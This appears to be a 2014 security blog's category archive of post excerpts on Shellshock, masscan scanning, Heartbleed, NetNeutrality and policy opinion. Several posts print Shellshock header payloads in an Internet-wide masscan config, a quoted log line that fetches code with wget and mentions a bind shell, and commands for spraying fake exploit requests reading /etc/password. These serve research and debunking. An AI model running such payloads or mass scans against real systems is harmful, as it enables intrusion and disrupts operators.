Archive

Category Archives for "Security"

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave it's name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, but I hadn't considered that bug before (to my great embarrassment), but of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there's about 3000 systems vulnerable just on port 80, just on the root "/" URL, without Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses that than.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.

Thirdly, it's embedded webserves on odd ports that are the real danger. Scanning for more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

Some earlier shows that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first 2 parts of this series, you can catch them here and here. The short version is that there are Enterprise customers that are actively seeking to automate the production deployment of their workloads, which leads them to discover that capturing business policy as part of the process is critical. We’ve arrived here at the point that once policy can be encapsulated in the process of application workload orchestration, it is then necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to-date, networking has largely been about any-to-any all equal connectivity (at least in Data Centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester researcher wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading

EFF, Animal Farm version

In celebration of "Banned Books Week", the EFF has posted a picture of their employees sitting around "reading" banned-books. Amusingly, the person in the back is reading "Animal Farm", a book that lampoons the populist, revolutionary rhetoric the EFF itself uses.

Orwell wrote Animal Farm at the height of World War II, when the Soviet Union was our ally against Germany, and where Stalin was highly regarded by intellectuals. The book attacks Stalin's cult of personality, showing how populist "propaganda controls the opinion of enlightened in democratic countries". In the book, populist phrases like "All animals are equal" over time get amended with such things as "...but some animals are more equal than others".

The hero worship geeks have for the EFF is a modern form of that cult of personality. Computer geeks unquestioningly support the EFF, even when the EFF contradicts themselves. There are many examples, such as supporting coder's rights while simultaneously attacking "unethical" coders. The best example, though, is NetNeutrality, where the EFF wants the government to heavily regulate Internet providers like Comcast. This is a complete repudiation of the EFF's earlier position set forth in their document "Declaration of Independence of Cyberspace Continue reading

It’s the Applications, Stupid (Part 2 of 3)!

In part 1 of this series, I mentioned a customer that was starting to understand how to build application policy into their deployment processes and in turn was building new infrastructure that could understand those policies. That’s a lot of usage of the word “policy” so it’s probably a good idea to go into a bit more detail on what that means.

In this context, policy refers to how specific IT resources are used in accordance with a business’s rules or practices. A much more detailed discussion of policy in the data center is covered in this most excellent networkheresy blog post (with great additional discussions here and here).  But suffice it to say that getting to full self-service IT nirvana requires that we codify business-centric policy and encapsulate the applications with that policy.

The goals of the previously mentioned customer were pretty simple, actually. They wanted to provide self-service compute, storage, networking, and a choice of application software stacks to their vast army of developers. They wanted this self-service capability to extend beyond development and test workloads to full production workloads, including fully automated deployment. They wanted to provide costs back to the business that were on par Continue reading

Automating a Multi-Action Security Workflow with VMware NSX

This post was written by VMware’s John Dias, (VCP-DCV), Sr. Systems Engineer, Cloud Management Solutions Engineering Team, and Hadar Freehling, Security & Compliance Systems Engineer Specialist

***

Through a joint effort with Hadar Freehling, one of my esteemed peers here at VMware, we co-developed a proof-of-concept workflow for a network security use case.  Hadar created a short video showing and explaining the use case, but in summary this is a workflow that reacts to and remediates a security issue flagged by third-party integration with VMware NSX. In the video, TrendMicro is used but it could be any other partner integration with vShield Endpoint.

Here’s what happens:

  • A virus is detected on a VM and is quarantined by the AV solution
  • The AV solution tags the VM with an NSX security tag
  • VMware NSX places the VM in a new Security Group, whose network policies steer all VM traffic through an intrusion prevention system (IPS)
  • vCenter Orchestrator (vCO) monitors the security group for changes and when a VM is added
    • a snapshot of the VM is taken for forensic purposes
    • a vSpan session (RSPAN) is set up on the Distributed Virtual Switch to begin capturing inbound/outbound traffic on the VM
    • once the Continue reading

Hacker “weev” has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:




I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn't require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don't do because of the chilling effect of government. For example, in our VNC research, we don't test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if 'weev' never intends on traveling to an extradition country, it's something he can do, and report the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to "free speech", Continue reading

Rebuttal to Volokh’s CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarianism has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to Continue reading

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response the to FCC's request for comment. What they tell you is a lie. I thought I’d write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort Continue reading

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think Continue reading

Masscan does STARTTLS

Just a quick note: I've updated my port-scanner masscan to support STARTTLS, including Heartbleed checks. Thus, if you scan:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed

...then it'll find not only all vulnerable SSL servers, but also vulnerable SMTP/POP3/IMAP4/FTP servers using STARTTLS.

The issue is that there are two ways unencrypted protocols can support SSL. One is to assign a new port number (like 443 instead of 80), establish the SSL connection first, then the normal protocol second within the encrypted tunnel. The second way is the method SMTP uses: it starts the normal unencrypted SMTP session, then issues the "STARTTLS" command to convert the connection to SSL, then continue with SMTP encrypted.

Here's what a scan will look like:

Banner on port 143/tcp on 198.51.100.42: [ssl] cipher:0x39 , imap.example.com  
Banner on port 143/tcp on 198.51.100.42: [vuln] SSL[heartbeat] SSL[HEARTBLEED] 
Banner on port 143/tcp on 198.51.100.42: [imap] * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5] Dovecot ready.x0a* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5x0aa001 OK Capability completed.x0aa002

Because of the --banners option, we see the normal Continue reading

Grow up, you babies

When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.

In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"
The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.

That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to Continue reading

C10M: The coming DDR4 revolution

Computer memory has been based on the same DRAM technology since the 1970s. Recent developments have been versions of the DDR technology, DDR2, DDR2, and now DDR4. The capacity and transfer speed have been doubling every couple years according to Moore's Law, but the latency has been stuck at ~70 nanoseconds for decades. The recent DDR4 standard won't fix this latency, but will give us a lot more tools to mitigate its effects.


Latency is bad. If a thread needs data from main memory, it must stop and wait for around 1000 instructions before the data is returned from memory. CPU caches mitigate most of this latency by keeping a copy of frequently used data in local, high-speed memory. This allows the processor to continue at full speed without having to wait.

The problem with Internet scale is that it can't be cached. If you have 10 million concurrent connections, each requiring 10-kilobytes of data, you'll need 100-gigabytes of memory. However, processors have only 20-megabytes of cache -- 50 thousand times too small to cache everything. That means whenever a packet arrives, the memory associated with that packet will not be in cache. The CPU will have to stop and Continue reading

That Apache 0day was troll

Last week, many people saw what they thought was an Apache 0day. They say logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-”
Somebody has come forward and taken credit for this, admitting it was troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.


I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 Continue reading

No, the CIA didn’t spy on other computers

The computer's the CIA spied on were owned and operated by the CIA.

I thought I'd mention this detail that is usually missing from today's news about the CIA spying on Senate staffers. The Senate staffers were investigating the CIA's torture program, reviewing classified documents. The CIA didn't trust the staffers, so they setup a special computer network just for the staffers to use -- a network secured and run by the CIA itself.

The CIA, though, spied on what the staffers did on the system. This allowed the CIA to manipulate investigation. When the staffers found some particularly juicy bit of information, the CIA was able to yank it from the system and re-classify it so that the staffers couldn't use it. Before the final report was ready, the CIA was already able to set the political machine in motion to defend itself from the report.

Thus, what the CIA did was clearly corrupt and wrong. It's just that it isn't what most people understand when they read today's headlines. It wasn't a case of the CIA hacking into other people's computers.

Many stories quote CIA director Brennan who said earlier this year:
I think a lot of people Continue reading

A Customer Perspective: VMware NSX, Micro-Segmentation & Next-Generation Security

VMware NSX and Palo Alto Networks are transforming the data center by combining the Columbia-S12_WTR_MGHI_564fast provisioning of network and security services with next-generation security protection for East-West traffic. At VMworld, John Spiegel, Global IS Communications Manager for Columbia Sportswear will take the stage to discuss their architecture, their micro-segmentation use case and their experience. This is session SEC1977 taking place on Tuesday, Aug 26, 2:30-3:30 p.m.

Micro-segmentation is quickly emerging as one of the primary drivers for the adoption of NSX. Below, John shares Columbia’s security journey ahead of VMworld

+++++++++++++++++++++++++++++++++++++++

When I started at Columbia, we were about a $500 million company. Now we’re closing in on $2 billion and hoping to get to $3 billion rather quickly. So as you can imagine, our IT infrastructure has to scale with the business. In 2009, we embarked on a huge project to add a redundant data center for disaster recovery. As part of the project, we partnered with VMware and quickly created a nearly 100% virtualized datacenter.  It was a huge success. But something was missing; a security solution that matched our virtualized data center. There just wasn’t a great way to insert security in order to Continue reading

Cliché: open-source is secure

Some in cybersec keep claiming that open-source is inherently more secure or trustworthy than closed-source. This is demonstrably false.

Firstly, there is the problem of usability. Unusable crypto isn't a valid option for most users. Most would rather just not communicate at all, or risk going to jail, rather than deal with the typical dependency hell of trying to get open-source to compile. Moreover, open-source apps are notoriously user-hostile, which is why the Linux desktop still hasn't made headway against Windows or Macintosh. The reason is that developers blame users for being stupid for not appreciating how easy their apps are, whereas Microsoft and Apple spend $billions in usability studies actually listening to users. Desktops like Ubuntu are pretty good -- but only when they exactly copy Windows/Macintosh. Ubuntu still doesn't invest in the usability studies that Microsoft/Apple do.

The second problem is deterministic builds. If I want to install an app on my iPhone or Android, the only usable way is through their app stores. This means downloading the binary, not the source. Without deterministic builds, there is no way to verify the downloaded binary matches the public source. The binary may, in fact, be compiled from different source Continue reading

Everything can be a bomb

This last week, pranksters replaced the US flag on top the Brooklyn Bridge with a white-flag. Nobody knows who or why. Many in the press have linked this to terrorism, pointing out that it could've been a bomb. Not only local New York newspapers have said this, but also CNN.

Such irrational fears demonstrate how deeply we've fallen for police-state fears, where every action is perceived as a potential terrorist threat.

It could've been a bomb, of course. But what could also have been a bomb is a van full of C4 explosives driven across the bridge. There are no checkpoints at either end inspecting vehicles with bomb sniffing dogs. What also could've been a bomb is a ship full of fertilizer that, when ignited, would act as a small nuke. The point is that everything can be a bomb. Instead of using this as justification for an ever increasing police-state, we just need to accept this and live with the danger -- because this danger is, in the end, tiny. A thousand 9/11 events would still not equal cancer, for example.

I mention this because the former 9/11 commission released a new report yesterday stoking the fears of cyber-terrorism, Continue reading